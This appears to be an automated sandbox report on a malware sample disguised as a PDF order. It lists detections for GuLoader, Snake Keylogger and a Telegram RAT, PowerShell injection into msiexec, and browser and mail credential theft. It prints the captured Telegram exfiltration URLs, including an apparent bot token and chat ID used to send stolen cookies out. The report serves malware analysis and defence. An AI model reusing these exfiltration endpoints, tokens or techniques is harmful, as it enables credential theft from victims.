Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\ Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 00000006.00000002.2957521886.000000002120A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: msiexec.exe PID: 8044, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 00000006.00000002.2957521886.0000000021101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected Telegram RAT
Source: Yara match File source: 00000006.00000002.2957521886.000000002120A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: msiexec.exe PID: 8044, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1560036 Sample: Order requirements CIF Gree... Startdate: 21/11/2024 Architecture: WINDOWS Score: 100 23 reallyfreegeoip.org 2->23 25 api.telegram.org 2->25 27 4 other IPs or domains 2->27 41 Found malware configuration 2->41 43 Multi AV Scanner detection for submitted file 2->43 45 Yara detected GuLoader 2->45 51 6 other signatures 2->51 8 Order requirements CIF Greece_pdf.exe 1 29 2->8         started        signatures3 47 Tries to detect the country of the analysis system (by using the IP) 23->47 49 Uses the Telegram API (likely for C&C communication) 25->49 process4 file5 21 C:\Users\user\AppData\...\Familieskabet.Sch, ASCII 8->21 dropped 53 Suspicious powershell command line found 8->53 12 powershell.exe 26 8->12         started        signatures6 process7 signatures8 55 Early bird code injection technique detected 12->55 57 Writes to foreign memory regions 12->57 59 Found suspicious powershell code related to unpacking or dynamic code loading 12->59 61 2 other signatures 12->61 15 msiexec.exe 16 8 12->15         started        19 conhost.exe 12->19         started        process9 dnsIp10 29 checkip.dyndns.com 132.226.247.73, 49738, 49742, 49750 UTMEMUS United States 15->29 31 api.telegram.org 149.154.167.220, 443, 49806, 49824 TELEGRAMRU United Kingdom 15->31 33 3 other IPs or domains 15->33 35 Tries to steal Mail credentials (via file / registry access) 15->35 37 Tries to harvest and steal browser information (history, passwords, etc) 15->37 39 Disables CMD prompt 15->39 signatures11
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
142.250.186.78
 drive.google.com United States
15169 GOOGLEUS false
149.154.167.220
 api.telegram.org United Kingdom
62041 TELEGRAMRU false
172.217.16.129
 drive.usercontent.google.com United States
15169 GOOGLEUS false
188.114.96.3
 reallyfreegeoip.org European Union
13335 CLOUDFLARENETUS false
132.226.247.73
 checkip.dyndns.com United States
16989 UTMEMUS false

Contacted Domains

Name IP Active
drive.google.com 142.250.186.78 true
drive.usercontent.google.com 172.217.16.129 true
reallyfreegeoip.org 188.114.96.3 true
api.telegram.org 149.154.167.220 true
checkip.dyndns.com 132.226.247.73 true
checkip.dyndns.org unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:347688%0D%0ADate%20and%20Time:%2022/11/2024%20/%2008:36:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20347688%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D false
    		high
    https://reallyfreegeoip.org/xml/8.46.123.75 false
      		high
      http://checkip.dyndns.org/ false
        		high
        https://api.telegram.org/bot8065526741:AAEj68BwW3BsUStAxrPkDSB2kLxwQ3yik84/sendDocument?chat_id=6897585916&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery false
          		high